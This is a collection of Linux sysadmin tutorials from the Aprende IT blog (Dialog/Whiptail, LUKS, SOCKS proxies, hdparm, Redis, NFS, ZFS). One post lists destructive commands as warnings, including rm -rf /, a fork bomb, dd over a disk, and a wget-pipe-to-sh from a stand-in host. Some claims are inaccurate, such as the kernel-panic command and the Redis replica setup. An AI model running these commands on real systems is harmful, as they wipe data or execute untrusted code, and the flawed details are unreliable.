La entrada Creating Interactive Scripts in Linux: Using Dialog or Whiptail se publicó primero en Aprende IT.
]]>Both Dialog and Whiptail are tools that allow creating simple and functional graphical interfaces within a text terminal. These tools are very useful for developing menus, dialog boxes, selection lists, progress bars, and much more. Throughout this article, we will guide you through the basic concepts and practical examples of both tools so that you can use them in your own scripts.
Dialog is a command-line tool used to generate interactive dialog boxes in text-based terminals. It is widely used in shell scripts to create interactive menus, confirmation boxes, forms, progress bars, among others. Dialog allows users to interact with a script through a text-based user interface, which is especially useful in server environments where a full graphical interface is not available.
To install Dialog on a Debian or Ubuntu-based distribution, simply run the following command:
sudo apt-get update sudo apt-get install dialog
For Red Hat-based distributions like CentOS or Fedora:
sudo yum install dialog
This example shows a simple message box with only an “OK” button:
#!/bin/bash dialog --title "Message" --msgbox "Hello, this is a simple message box." 6 50
Explanation: In this script, –title defines the dialog box title, –msgbox is the type of dialog used, and “6 50” are the dimensions of the box (6 lines high and 50 characters wide).
The following example creates a menu where the user can select an option:
#!/bin/bash option=$(dialog --title "Main Menu" --menu "Select an option:" 15 50 4 1 "Option 1" 2 "Option 2" 3 "Option 3" 4 "Exit" 3>&1 1>&2 2>&3) clear echo "You selected option: $option"
Explanation: The menu is displayed with numbered options. 3>&1 1>&2 2>&3 is used to redirect the user’s selection back to the standard output.
In this example, the user can select one or more items from a list:
#!/bin/bash options=$(dialog --title "Package Selection" --checklist "Select the packages you want to install:" 15 50 5 1 "Apache" off 2 "MySQL" off 3 "PHP" off 4 "Python" off 5 "Java" off 3>&1 1>&2 2>&3) clear echo "Selected packages: $options"
Explanation: –checklist creates a list of items with checkboxes, where off indicates that the checkbox is unchecked by default.
Progress bars are useful for showing the progress of a task. Here’s an example:
#!/bin/bash { for ((i = 0 ; i <= 100 ; i+=10)); do sleep 1 echo $i done } | dialog --title "Progress" --gauge "Installing..." 10 70 0
Explanation: –gauge is used to create a progress bar. The for loop simulates the progress of a task, increasing the bar by 10% every second.
Whiptail is a lightweight alternative to Dialog that also allows creating text-based interactive interfaces in shell scripts. Although Whiptail offers a similar set of features, it is especially useful in systems where Dialog is not available or where a lighter tool is preferred.
To install Whiptail on Debian, Ubuntu, and their derivatives:
sudo apt-get update sudo apt-get install whiptail
In distributions like CentOS, Red Hat, and Fedora:
sudo yum install newt
As with Dialog, you can create a simple message box:
#!/bin/bash whiptail --title "Message" --msgbox "This is a simple message using Whiptail." 8 45
Explanation: This example is similar to Dialog, but using Whiptail. The dimensions of the box are slightly different.
Creating interactive menus is easy with Whiptail:
#!/bin/bash option=$(whiptail --title "Main Menu" --menu "Choose an option:" 15 50 4 \ "1" "Option 1" \ "2" "Option 2" \ "3" "Option 3" \ "4" "Exit" 3>&1 1>&2 2>&3) clear echo "You selected option: $option"
Explanation: This script works similarly to the Dialog example, allowing the user to select an option from a menu.
Whiptail also allows creating selection lists with checkboxes:
#!/bin/bash options=$(whiptail --title "Package Selection" --checklist "Select the packages you want to install:" 15 50 5 \ "Apache" "" ON \ "MySQL" "" OFF \ "PHP" "" OFF \ "Python" "" OFF \ "Java" "" OFF 3>&1 1>&2 2>&3) clear echo "Selected packages: $options"
Explanation: In this example, “ON” indicates that the checkbox is checked by default, unlike Dialog’s “off”.
Finally, here’s an example of a progress bar with Whiptail:
#!/bin/bash { for ((i = 0 ; i <= 100 ; i+=10)); do sleep 1 echo $i done } | whiptail --gauge "Installing..." 6 50 0
Explanation: This example is very similar to Dialog, but using Whiptail’s syntax.
Both Dialog and Whiptail are powerful and flexible tools that allow system administrators and developers to create interactive user interfaces within a terminal. Although both tools are similar in functionality, the choice between one or the other may depend on the specific needs of the system and personal preferences.
Dialog is more popular and widely documented, while Whiptail is a lighter alternative that may be preferred in systems where minimizing resource usage is crucial.
In this article, we have covered the basics of Dialog and Whiptail with practical examples that will allow you to start creating your own interactive scripts. Whether you need a simple menu, a message box, or a progress bar, these tools will provide the necessary functionalities to improve user interaction with your scripts.
Remember that the key to mastering these tools is practice. Try the examples provided, modify them to suit your needs, and continue exploring the many possibilities that Dialog and Whiptail offer to make your scripts more intuitive and user-friendly.
Below are two example scripts of two interactive menus:
Dialog
#!/bin/bash # Example of a menu using Dialog dialog --menu "Select an option:" 15 50 4 \ 1 "View system information" \ 2 "Show disk usage" \ 3 "Configure network" \ 4 "Exit" 2>selection.txt # Read the selected option option=$(cat selection.txt) case $option in 1) echo "Showing system information..." # Corresponding commands would go here ;; 2) echo "Showing disk usage..." # Corresponding commands would go here ;; 3) echo "Configuring network..." # Corresponding commands would go here ;; 4) echo "Exiting..." exit 0 ;; *) echo "Invalid option." ;; esac
The result would be:
Whiptail
#!/bin/bash # Example of a menu using Whiptail option=$(whiptail --title "Main Menu" --menu "Select an option:" 15 50 4 \ "1" "View system information" \ "2" "Show disk usage" \ "3" "Configure network" \ "4" "Exit" 3>&1 1>&2 2>&3) # Verify the selected option case $option in 1) echo "Showing system information..." # Corresponding commands would go here ;; 2) echo "Showing disk usage..." # Corresponding commands would go here ;; 3) echo "Configuring network..." # Corresponding commands would go here ;; 4) echo "Exiting..." exit 0 ;; *) echo "Invalid option." ;; esac
With Whiptail, the result would be this:
As you can see, the results are very similar.
For Dialog and Whiptail, you can find extensive documentation at https://invisible-island.net/dialog/dialog.html
La entrada Creating Interactive Scripts in Linux: Using Dialog or Whiptail se publicó primero en Aprende IT.
]]>La entrada Partition and Disk Encryption with LUKS on Linux se publicó primero en Aprende IT.
]]>Before diving into the world of encryption with LUKS, it is essential to ensure you have the appropriate tools installed on your system. Generally, most Linux distributions include these encryption tools by default, but it’s always good to verify.
You can install the necessary tools using your distribution’s package manager. In Debian-based distributions, like Ubuntu, you can run the following command in the terminal:
sudo apt install cryptsetup
If you are using a Red Hat-based distribution, like Fedora or CentOS, you can install the encryption tools with the following command:
sudo dnf install cryptsetup
Once you have installed cryptsetup, you will be ready to start working with LUKS.
The first step to encrypt a partition or disk on Linux is to create a LUKS volume. This volume will act as an encryption layer that protects the data stored on the partition or disk.
To create a LUKS volume, you will need to specify the partition or disk you want to encrypt. Make sure the partition is unmounted before proceeding. Suppose we want to encrypt the partition /dev/sdb1. The following command will create a LUKS volume on this partition:
sudo cryptsetup luksFormat /dev/sdb1
This command will initiate the process of creating the LUKS volume on the specified partition. You will be prompted to confirm this action, as the process will erase all existing data on the partition. After confirming, you will be asked to enter a password to unlock the LUKS volume in the future. Make sure to choose a secure password and remember it well, as you will need it every time you want to access the encrypted data.
Once the process is complete, you will have a LUKS volume created on the specified partition, ready to be used.
After creating a LUKS volume, the next step is to open it to access the data stored on it. To open a LUKS volume, you will need to specify the partition containing the volume and assign it a name.
sudo cryptsetup luksOpen /dev/sdb1 my_encrypted_partition
In this command, /dev/sdb1 is the partition containing the LUKS volume, and my_encrypted_partition is the name we are assigning to the opened volume. Once you run this command, you will be asked to enter the password you specified during the creation of the LUKS volume. After entering the correct password, the volume will open and be ready to be used.
To close the LUKS volume and block access to the encrypted data, you can use the following command:
sudo cryptsetup luksClose my_encrypted_partition
This command will close the LUKS volume with the specified name (my_encrypted_partition in this case), preventing access to the data stored on it until it is opened again.
Once you have opened a LUKS volume, you can create a file system on it to start storing data securely. You can use any Linux-compatible file system, such as xfs or btrfs.
Suppose we want to create an xfs file system on the opened LUKS volume (my_encrypted_partition). The following command will create an xfs file system on the volume:
sudo mkfs.xfs /dev/mapper/my_encrypted_partition
This command will format the opened LUKS volume with an xfs file system, allowing you to start storing data on it securely.
Once you have created a file system on a LUKS volume, you can mount it to the file system to access the data stored on it. To mount a LUKS volume, you can use the following command:
sudo mount /dev/mapper/my_encrypted_partition /mnt
In this command, /dev/mapper/my_encrypted_partition is the path to the block device representing the opened LUKS volume, and /mnt is the mount point where the file system will be mounted.
After mounting the LUKS volume, you can access the data stored on it as you would with any other file system mounted on Linux. When you have finished working with the data, you can unmount the LUKS volume using the following command:
sudo umount /mnt
This command will unmount the file system of the LUKS volume, preventing access to the data stored on it until it is mounted again.
LUKS provides several tools for managing volumes, including the ability to change the password, add additional keys, and backup the headers of the volumes.
To change the password of a LUKS volume, you can use the following command:
sudo cryptsetup luksChangeKey /dev/sdb1
This command will prompt you for the current password of the LUKS volume and then allow you to enter a new password.
If you want to add an additional key to the LUKS volume, you can use the following command:
sudo cryptsetup luksAddKey /dev/sdb1
This command will prompt you for the current password of the LUKS volume and then allow you to enter a new additional key.
To backup the header of a LUKS volume, you can use the following command:
sudo cryptsetup luksHeaderBackup /dev/sdb1 --header-backup-file backup_file
This command will backup the header of the LUKS volume to the specified file, allowing you to restore it in case the volume header is damaged.
sudo cryptsetup luksFormat /dev/DISK sudo cryptsetup luksOpen /dev/DISK DECRYPTED_DISK sudo mkfs.xfs /dev/mapper/DECRYPTED_DISK sudo mount /dev/mapper/DECRYPTED_DISK /mount_point
Once you have encrypted a partition or disk using LUKS on Linux, you may want to configure the automatic opening of the LUKS container during system boot and mount it at a specific point in the file system. This can be achieved using the crypttab and fstab configuration files.
The crypttab file is used to configure the automatic mapping of encrypted devices during the system boot process. You can specify the encrypted devices and their corresponding encryption keys in this file.
To configure an encrypted device in crypttab, you first need to know the UUID (Universally Unique Identifier) of the LUKS container. You can find the UUID by running the following command:
sudo cryptsetup luksUUID /dev/sdb1
Once you have the UUID of the LUKS container, you can add an entry in the crypttab file to configure the automatic mapping. For example, suppose the UUID of the LUKS container is 12345678-1234-1234-1234-123456789abc. You can add the following entry to the crypttab file:
my_encrypted_partition UUID=12345678-1234-1234-1234-123456789abc none luks
It can also be done this way without using the UUID:
my_encrypted_partition /dev/sdb1 none luks
In this entry, my_encrypted_partition is the name we have given to the LUKS container, and UUID=12345678-1234-1234-1234-123456789abc is the UUID of the container. The word none indicates that no pre-shared key is used, and luks specifies that the device is encrypted with LUKS.
Once you have configured the automatic mapping of the encrypted device in crypttab, you can configure the automatic mounting of the file system in fstab. The fstab file is used to configure the automatic mounting of file systems during system boot.
To configure the automatic mounting of a file system in fstab, you first need to know the mount point and the file system type of the LUKS container. Suppose the mount point is /mnt/my_partition and the file system is xfs. You can add an entry in the fstab file as follows:
/dev/mapper/my_encrypted_partition /mnt/my_partition xfs defaults 0 2
In this entry, /dev/mapper/my_encrypted_partition is the path to the block device representing the opened LUKS container, /mnt/my_partition is the mount point where the file system will be mounted, xfs is the file system type, defaults specifies the default mount options, and 0 2 specifies the file system check options.
In the case of a server, I would not have crypttab active, meaning I would leave the configuration set but commented out, as well as with fstab. I would perform the mounts manually after a reboot. This avoids having to use key files and prevents some derived issues.
La entrada Partition and Disk Encryption with LUKS on Linux se publicó primero en Aprende IT.
]]>La entrada Create SOCKS Proxy with Dante and OpenSSH se publicó primero en Aprende IT.
]]>In the digital era, maintaining online privacy and security is more crucial than ever. One way to protect your identity and data on the internet is through the use of a SOCKS proxy server. This type of proxy acts as an intermediary between your device and the internet, hiding your real IP address and encrypting your internet traffic. In this article, we will guide you step by step on how to set up your own SOCKS proxy server on Ubuntu using Dante, a versatile and high-performance proxy server.
Before diving into the Dante setup, it’s essential to prepare your system and ensure it is updated. To do this, open a terminal and run the following commands:
sudo apt update sudo apt install dante-server
These commands will update your system’s package list and then install Dante, respectively.
Once Dante is installed, the next step is to configure the proxy server. This is done by editing the danted.conf configuration file located in /etc/danted/. To do this, use your preferred text editor. Here, we will use vim:
vim /etc/danted.conf
Inside this file, you must specify crucial details such as the external and internal interfaces, the authentication method, and access rules. Below, we show you an example configuration that you can adjust according to your needs:
logoutput: syslog user.privileged: root user.unprivileged: nobody # The external interface (can be your public IP address or the interface name) external: eth0 # The internal interface (usually your server's IP address or loopback) internal: 0.0.0.0 port=1080 # Authentication method socksmethod: username # Access rules client pass { from: 0.0.0.0/0 to: 0.0.0.0/0 log: connect disconnect error } # Who can use this proxy socks pass { from: 0.0.0.0/0 to: 0.0.0.0/0 command: bind connect udpassociate log: connect disconnect error socksmethod: username }
This configuration defines a SOCKS server that listens on all available interfaces (0.0.0.0) on port 1080. It uses username authentication and allows connections from and to any address.
For the proxy to be secure and not open to the public, it’s necessary to create a specific user for the connection. This is achieved with the following commands:
sudo useradd -r -s /bin/false username sudo passwd username
Here, username is the username you wish for the proxy connection. The useradd command creates the user, and passwd allows you to assign a password.
With the user created and the configuration file adjusted, it’s time to restart the Dante service and ensure it runs at system startup:
sudo systemctl restart danted.service sudo systemctl enable danted.service sudo systemctl status danted.service
Furthermore, it’s important to ensure that port 1080, where the proxy listens, is allowed in the firewall:
sudo ufw allow 1080/tcp
Finally, to verify everything is working correctly, you can test the connection through the proxy with the following command:
curl -v -x socks5://username:password@your_server_ip:1080 https://whatismyip.com/
Remember to replace username, password, and your_server_ip with your specific information. This command will use your proxy server to access a website that shows your public IP address, thus verifying that traffic is indeed being redirected through the SOCKS proxy.
Setting up a SOCKS proxy server with Dante may seem complex at first, but by following these steps, you can have a powerful system
You can configure a SOCKS5 proxy server using OpenSSH on Ubuntu 22.04, which is a simpler and more direct alternative in certain cases, especially for personal use or in situations where you already have an SSH server set up. Below, I explain how to do it:
Unlike Dante, with which we can create a proxy service with authentication, with OpenSSH, we can create a tunnel on a port that can be used as a SOCKS proxy without authentication, so it is convenient to use it only for localhost within a single computer (we will explain this better later)
If you don’t already have OpenSSH Server installed on your server that will act as the proxy, you can install it with the following command as long as it’s a Debian / Ubuntu-based distribution:
sudo apt update sudo apt install openssh-server
Ensure the service is active and running correctly with:
sudo systemctl status ssh
By default, OpenSSH listens on port 22. You can adjust additional configurations by editing the /etc/ssh/sshd_config file, such as changing the port, restricting access to certain users, etc. If you make changes, remember to restart the SSH service:
sudo systemctl restart ssh
To configure an SSH tunnel that works as a SOCKS5 proxy, use the following command from your client (not on the server). This command establishes an SSH tunnel that listens locally on your machine on the specified port (for example, 1080) and redirects traffic through the SSH server:
ssh -D 1080 -C -q -N user@server_address
At this point, we mention that with the -D option, you should only specify the port as exposing the port to the entire network may allow other devices on the network to use this proxy without authenticating:
[ger@ger-pc ~]$ ssh -D 0.0.0.0:1081 root@192.168.54.100
If we check with the command ss or netstat, we can see that it is listening on all networks:
[ger@ger-pc ~]$ ss -putan|grep 1081 tcp LISTEN 0 128 0.0.0.0:1081 0.0.0.0:* users:(("ssh",pid=292405,fd=4)) [ger@ger-pc ~]$
However, if we connect by specifying only the port without 0.0.0.0 or without any IP, it will only do so on localhost:
[ger@ger-pc ~]$ ssh -D 1081 root@192.168.54.100 ....... [ger@ger-pc ~]$ ss -putan|grep 1081 tcp LISTEN 0 128 127.0.0.1:1081 0.0.0.0:* users:(("ssh",pid=292485,fd=5)) tcp LISTEN 0 128 [::1]:1081 [::]:* users:(("ssh",pid=292485,fd=4)) [ger@ger-pc ~]$
Now you can configure your browser or application to use the SOCKS5 proxy on localhost and port 1080. Each application has a different way of configuring this, so you will need to review the preferences or documentation of the application.
Automating the Connection (Optional):
If you need the tunnel to be established automatically at startup or without manual interaction, you may consider using a tool like autossh to keep the tunnel connection open and reconnect in case it drops.
This is an effective way to establish a quick SOCKS5 proxy for a user or a few users, especially useful for bypassing network restrictions or securing your traffic on untrusted networks. The main advantage of this method is its simplicity and that it leverages existing SSH infrastructure without the need to configure additional software on the server.
La entrada Create SOCKS Proxy with Dante and OpenSSH se publicó primero en Aprende IT.
]]>La entrada Commands you should not run in Linux se publicó primero en Aprende IT.
]]>We start with the infamous rm -rf / command, a statement that seems simple but hides destructive potential. This command deletes all system files, starting from the root (/). The -r modifier indicates that deletion should be recursive, that is, affect all files and directories contained in the specified directory, while -f forces deletion without asking for confirmation. Running this command as a superuser means saying goodbye to your operating system, your data, and any hope of easy recovery.
In short, be careful with executing recursive rm commands as we can delete more than we want:
This enigmatic command is an example of a fork bomb function. It defines a function called : that, when executed, calls itself twice, and each call is executed in the background. This causes a chain reaction, doubling processes indefinitely and consuming system resources until it hangs. It’s a denial of service attack against your own machine, pushing processing and memory capacity to the limit.
To better understand, :(){ :|: & };:
is the same as running:
bomb() { bomb | bomb &; }; bomb
The dd command is a powerful tool used to convert and copy files at the block level. In this context, if=/dev/zero
sets the input to a continuous stream of zeros, and of=/dev/sda
designates the target device, usually the main hard drive. This command overwrites the entire disk with zeros, irreversibly erasing the operating system, programs, and user data. It is essential to understand the function of each part of the command before executing something as powerful as dd.
For example, the command wget http://example.com/malicious.sh -O- | sh
This command uses wget to download a script from an Internet address and executes it directly in the shell with sh. The danger lies in executing code without reviewing it, coming from an unreliable source. It could be a malicious script designed to damage your system or compromise your security. It is always vital to verify the content of scripts before executing them.
Modifying permissions with, for example, chmod 777 / -R
can render your system unusable.
chmod changes the permissions of files and directories, and 777 grants full permissions (read, write, and execute) to all users. Applying this recursively (-R) to the root (/) removes any form of access control, exposing the system to serious security risks. Any user could modify any file, with potentially disastrous consequences.
Similar to the previous case, chown changes the owner and group of files and directories. Using nobody:nogroup assigns ownership to a user and group without privileges, applied recursively from the root, can leave the system in an inoperable state, as critical services and processes might lose access to the files necessary for their operation.
Moving files to the /dev/null directory is equivalent to deleting them, as /dev/null is a black hole in the system that discards everything it receives. This command, applied to the user directory, can result in the loss of all personal data, settings, and important files stored in your home.
The find command can be very dangerous, for example, if we execute the following command:
find / -name '*.jpg' -type f -delete
What happens is that find is a versatile tool for searching for files in the file system that meet certain criteria. This command searches for all .jpg files in the system and deletes them. Although it might seem useful for freeing up space, indiscriminately deleting files based only on their extension can result in the loss of important documents, memories, and resources.
The following command is capable of causing a kernel panic:
echo 1 > /proc/sys/kernel/panic;
Causing a Kernel Panic error in Linux is comparable to the dreaded blue screen of death in Windows, debunking the belief that Linux is infallible. Through certain commands, like redirecting random data to critical system devices or directly manipulating memory, Linux can be forced into a kernel panic state, making the system unrecoverable without a reboot. These commands are highly risky and can result in data loss or system corruption.
Overwriting the hard drive in Linux, using commands that redirect the output of any Bash command directly to a disk device (/dev/hda
), can result in total data loss. This process is irreversible and differs from formatting, as it involves writing raw data over the entire unit, making it unusable. It’s a highly dangerous action with no practical benefit in most contexts.
An example of this would be:
command1 > /dev/sda1
Exploring and experimenting with Linux can be a rewarding and educational experience. However, it’s crucial to do so with knowledge and caution. The commands discussed here represent only a fraction of what is possible (and potentially dangerous) in the terminal. The golden rule is simple: if you’re not sure what a command does, research before executing it. Protecting your system is protecting your work, your memories, and ultimately, your peace of mind.
La entrada Commands you should not run in Linux se publicó primero en Aprende IT.
]]>La entrada Performance Testing in Linux with UnixBench se publicó primero en Aprende IT.
]]>UnixBench is an open-source performance test suite designed for Unix and Linux systems. It is characterized by its ease of use and depth, allowing the performance of various system components to be measured.
The installation of UnixBench is simple and is carried out through a few commands in the terminal:
Clone the UnixBench repository:
git clone https://github.com/kdlucas/byte-unixbench.git
Access the UnixBench directory:
cd byte-unixbench/UnixBench
Compile and build UnixBench:
make
To launch your first test, follow these steps:
In the same UnixBench folder, execute:
./Run
This will start a series of tests that will evaluate different aspects of your system.
The results of UnixBench are presented in the form of scores and data, providing a clear idea of your system’s performance in areas such as CPU, memory, and disk operations.
UnixBench allows specific tests for different components. For example, to focus on the CPU:
./Run dhry2reg whetstone-double
UnixBench offers the flexibility to customize the tests. You can choose which tests to run and adapt them to your specific needs.
While the tests are running, it is useful to perform real-time monitoring of the system using tools such as top or htop.
In addition to the basic components, UnixBench can also evaluate your system’s network performance, a crucial aspect for servers or network-dependent environments.
UnixBench can be integrated with advanced system monitoring tools, providing a detailed analysis of system performance during tests.
After the tests, you can identify areas for improvement and start optimizing your system, adjusting configurations, updating hardware, or modifying the software environment.
La entrada Performance Testing in Linux with UnixBench se publicó primero en Aprende IT.
]]>La entrada The hdparm Utility: Tune Your Disk se publicó primero en Aprende IT.
]]>Most Linux distributions already include hdparm. To start, open a terminal and run:
hdparm -I /dev/sda | more
This command will show you all the available information about your disk, including the model and firmware version.
To know the data transfer speed of your disk, use:
hdparm -t /dev/sda
Repeat the measurement several times to get an average. If you want to measure the pure speed of the disk, without the effect of the system buffer, use hdparm -t --direct /dev/sda
. You can also specify an offset with hdparm -t --direct --offset 500 /dev/sda
to test different areas of the disk.
To improve data transmission, hdparm allows you to adjust the number of sectors read at once with the command:
hdparm -m16 /dev/sda
This command configures the simultaneous reading of 16 sectors. Additionally, you can activate the “read-ahead” function with hdparm -a256 /dev/sda, which causes the disk to preemptively read 256 sectors.
With hdparm -c /dev/sda, you can check if your disk is operating in 32-bit mode, and force this mode with -c3. If your disk is noisy, you can reduce the noise by activating the “acoustic mode” with hdparm -M 128 /dev/sda, or maximize speed with `hdparm -M 254 /dev/sda.
The command hdparm -W /dev/sda allows you to activate or deactivate the write cache, which can speed up data writing but at the risk of data loss in case of power cuts.
You can manage the disk’s power saving with hdparm -B255 /dev/sda to deactivate it, or use values between 1 and 254 for different levels of saving and performance. With hdparm -S 128 /dev/sda, you set the idle time before the disk enters sleep mode.
SSDs can accumulate residual data blocks. To clean them, use the script wiper.sh /dev/sda, but with caution, as it can lead to data loss.
For securely erasing an SSD, hdparm offers the “secure erase” function with
hdparm --user-master u --security-erase 123456 /dev/sdb
This process completely removes data, but requires caution as it can render the SSD unusable in some cases.
For IDE disks, it is important to check and configure DMA with hdparm -d1 /dev/hda to improve data transfer. If you encounter problems, deactivate it with `hdparm -d0 /dev/hda.
To ensure that changes made with hdparm persist after restarting, you must add them to the system startup scripts or, in Debian-based systems, in the /etc/hdparm.conf file.
Remember that this is a powerful tool and should be used with knowledge. Always make backups before making significant changes and consult specific documentation.
La entrada The hdparm Utility: Tune Your Disk se publicó primero en Aprende IT.
]]>La entrada How to Create a Redis Cluster: Step-by-Step Guide se publicó primero en Aprende IT.
]]>Before you begin, you need to have Redis installed on your system. You can download it from its official page. Once installed, verify its operation with the redis-server command. You should see a message indicating that Redis is functioning.
A Redis cluster is composed of several nodes. For this example, we’ll configure three nodes on the same machine to simplify things. Create three different directories, each representing a Redis node. In each directory, you’ll need a configuration file for the node. You can name it redis.conf.
Inside redis.conf, set the following configurations:
conf Copy code port [NODE_PORT] cluster-enabled yes cluster-config-file nodes.conf cluster-node-timeout 5000 appendonly yes
Make sure to change [NODE_PORT] to a unique port for each node.
Now, start each Redis node with its respective configuration. Open a terminal for each node and execute:
redis-server ./redis.conf Creating the Cluster
With the nodes running, it’s time to form the cluster. Redis provides a tool called redis-cli for handling administrative tasks. Use it to create the cluster with the following command:
redis-cli --cluster create [NODE1_IP]:[PORT1] [NODE2_IP]:[PORT2] [NODE3_IP]:[PORT3] --cluster-replicas 1
Make sure to replace [NODE_IP] and [PORT] with the corresponding IP addresses and ports of your nodes.
After creating the cluster, verify its status with:
redis-cli --cluster check [NODE_IP]:[PORT]
This command will give you a detailed report of the status of your cluster.
Now that you have your cluster, it’s important to know how to handle keys within it. Redis handles keys through a technique called sharding, where keys are distributed among the different nodes.
To insert a key, use:
redis-cli -c -p [PORT] SET [KEY_NAME] [VALUE]
To retrieve a key:
redis-cli -c -p [PORT] GET [KEY_NAME]
Remember that -c allows redis-cli to automatically redirect the command to the correct node.
It’s vital that you know how to handle situations when something goes wrong. In a Redis cluster, if a node fails, the system will automatically try to use a replica to maintain availability. However, it’s important to monitor the state of the cluster and perform regular maintenance.
To check the status of the nodes, use:
redis-cli -p [PORT] CLUSTER NODES
If a node has failed and you need to replace it, you can do so without stopping the cluster. Follow the initial configuration steps for a new node and then use it to replace the failed node with redis-cli.
As your application grows, you might need to scale your cluster. Redis allows you to add more nodes to the cluster without interruptions. To add a new node, set it up as we have seen before and then use it in the cluster with:
redis-cli --cluster add-node [NEW_NODE_IP]:[NEW_PORT] [EXISTING_NODE_IP]:[EXISTING_PORT]
Then, if necessary, you can rebalance the keys among the nodes.
Regular maintenance is crucial. Make sure to keep your Redis version up to date and to regularly check the logs. It’s also a good idea to set up a monitoring system to receive alerts about problems in the cluster.
I hope this guide has been helpful for you to create and manage your Redis cluster. As you’ve seen, with a few commands and some configuration, you can have a robust and scalable system. Remember, practice makes perfect, so don’t hesitate to experiment and learn more about this powerful system.
La entrada How to Create a Redis Cluster: Step-by-Step Guide se publicó primero en Aprende IT.
]]>La entrada How to Set Up an NFS Server: Step-by-Step Guide for Ubuntu, Debian, and Red Hat-Based Distributions se publicó primero en Aprende IT.
]]>Before diving deep into the configuration, it’s worth understanding what NFS is. It’s a protocol that lets Linux machines (and others like MacOS or UNIX systems) mount remote directories as if they were local. So, if you have several devices on your network, you can share files among them seamlessly with NFS. Cool, right?
If you’re running a business or simply have multiple machines at home, file sharing might be a daily task. Imagine if every time you wanted to share a file, you’d need to use a flash drive. Madness! That’s where NFS comes in, allowing you to share directories across multiple devices without a hitch.
We’ll start with Ubuntu and Debian, two of the friendliest distributions for Linux newcomers. Although the steps are quite similar, there’s always a slight variation worth noting.
First things first, always ensure your system is up-to-date. Open your terminal and run:
sudo apt update && sudo apt upgrade
In your terminal, install the packages we’ll need to set up the NFS server:
sudo apt install nfs-kernel-server
Suppose you want to share the directory /home/your_user/shared. First, you need to grant it the appropriate permissions:
sudo chown nobody:nogroup /home/your_user/shared
Then, modify the /etc/exports file to define which directories you want to share:
sudo nano /etc/exports
Add the following line:
/home/your_user/shared *(rw,sync,no_subtree_check)
With everything set, all that’s left is to start the service and make sure it runs at system boot:
sudo systemctl start nfs-kernel-server sudo systemctl enable nfs-kernel-server
If you’re on the Red Hat side with distributions like CentOS, Rocky Linux, Alma Linux, or Fedora, the process is just as straightforward, with some slight differences.
Open your terminal and type:
sudo dnf install nfs-utils
To ensure NFS operates correctly, you’ll need to enable and start a few services:
sudo systemctl enable rpcbind nfs-server sudo systemctl start rpcbind nfs-server
If the directory you wish to share is /home/your_user/shared, ensure it has the correct permissions:
sudo chown nobody:nogroup /home/your_user/shared
Then, like with Ubuntu and Debian, modify the /etc/exports file:
sudo nano /etc/exports
And add:
/home/your_user/shared *(rw,sync,no_root_squash)
After setting up the shared directories, have NFS recognize the changes:
sudo exportfs -r
Setting up NFS is easy, but don’t forget about security. Ensure you only share necessary directories and limit access to trusted IPs. Also, consider using firewalls and, if possible, further configurations like SELinux or AppArmor.
Now that you know how to set up an NFS server on the most popular distributions, it’s time for you to put it into practice. As you’ve seen, although there are some differences based on distribution, the process is pretty straightforward. No excuses not to have your NFS server up and running!
Always remember to test and backup before making changes in production environments. And if you ever feel lost, come back here; I’m here to help! Best of luck with your NFS journey!
La entrada How to Set Up an NFS Server: Step-by-Step Guide for Ubuntu, Debian, and Red Hat-Based Distributions se publicó primero en Aprende IT.
]]>La entrada 10 Common Linux Problems and How to Solve Them se publicó primero en Aprende IT.
]]>Imagine: you just did an update and suddenly, bam! Your system won’t boot. It’s a pain, but there’s a solution. Chances are, something with the kernel or the drivers isn’t playing nicely.
Solution: One option is to boot using an older kernel. When the GRUB menu (boot manager) appears, select an older version of the kernel. If everything runs smoothly, you might want to stick with that kernel until issues with the new one are resolved.
Sometimes, Linux can be a bit finicky with Wi-Fi drivers. If your connection isn’t working, you might need to install or update the appropriate driver.
Solution: Connect your computer to the Internet using an Ethernet cable and look for the right drivers for your Wi-Fi card. Typically, your distribution’s driver manager will provide options for installation.
If your display looks blurry or the resolution is off, Linux might not be correctly recognizing your monitor or graphics card.
Solution: Head to your system’s display settings and try different resolutions. If that doesn’t work, consider installing or updating the drivers for your graphics card.
Can’t hear anything? What a drag! But don’t get stressed, it’s often an easy fix.
Solution: First, ensure the sound isn’t muted and the volume is at an appropriate level. If that doesn’t do the trick, go to the sound manager and make sure the output is configured correctly. Lastly, if it’s still not working, you might need to install or update your sound drivers.
Linux has a plethora of software repositories, but sometimes, the program you want isn’t there.
Solution: Look for a .deb or .rpm package on the program’s official website. Once downloaded, open your distribution’s software center and follow the installation instructions. If the software doesn’t offer Linux packages, you could try tools like Wine to run Windows applications.
It’s rare, but it happens. If Linux freezes up on you, there are a couple of things you can try.
Solution: Attempt to switch to a virtual terminal by pressing Ctrl+Alt and an F key (from F1 to F7). From there, you can try restarting the graphical interface with sudo service lightdm restart
or the appropriate command for your display manager. If that doesn’t work, you might need to reboot your machine.
If you get a message saying you don’t have permission to access or modify a file, don’t despair.
Solution: Open a terminal and use the chmod
command to change the file’s permissions. If you’re unsure how to use it, look up a guide on chmod
and chown
. But be careful and make sure you know what you’re doing.
Sometimes, when you plug in a USB device, Linux doesn’t recognize it.
Solution: First, try plugging it into a different port. If that doesn’t work, open a terminal and type lsusb
to see if the system recognizes it. If it’s on the list, you might just need to manually mount it.
On occasion, when trying to update, you can run into errors that prevent completion.
Solution: Open a terminal and run sudo apt-get update
followed by sudo apt-get upgrade
(or the corresponding commands for your package manager). If you encounter errors, try searching for them online; someone has likely already found a solution.
If you’re having trouble accessing a server via SSH, you’re not alone.
Solution: Make sure the SSH service is active on the server and that there’s no firewall blocking port 22. You might also need to generate or renew your SSH keys on your client machine.
And there you have it! Some of the most common issues you might encounter while using Linux and how to address them. Remember, the Linux community is vast and always willing to help, so if you hit a snag, someone else has likely been through it and can lend a hand. Keep up the spirit and enjoy Linux!
La entrada 10 Common Linux Problems and How to Solve Them se publicó primero en Aprende IT.
]]>La entrada Everything You Need to Know About ZFS Snapshots se publicó primero en Aprende IT.
]]>Before we delve into snapshots, let me give you some context on ZFS. It’s a file system and volume manager that is simply brilliant. Not just because of its advanced features, but also for its efficiency and flexibility.
A snapshot is like a photograph of your data at a specific moment. Imagine being able to freeze time and capture precisely how your files and folders look at that exact moment. That’s a snapshot. It’s an essential tool if you ever need to revert changes, recover lost data, or simply take a peek into the past.
ZFS has a peculiar feature called COW, which stands for Copy On Write. Basically, when you make changes, ZFS doesn’t rewrite your original data. Instead, it creates a new block for those changes. So, ZFS snapshots don’t take up extra space unless you modify the original data. Plus, creating a snapshot in ZFS takes only seconds, regardless of how much data you have.
To create a snapshot in ZFS, the command is straightforward: zfs snapshot. Let’s say you have a dataset named my_data and you want to take a snapshot of it. Just run:
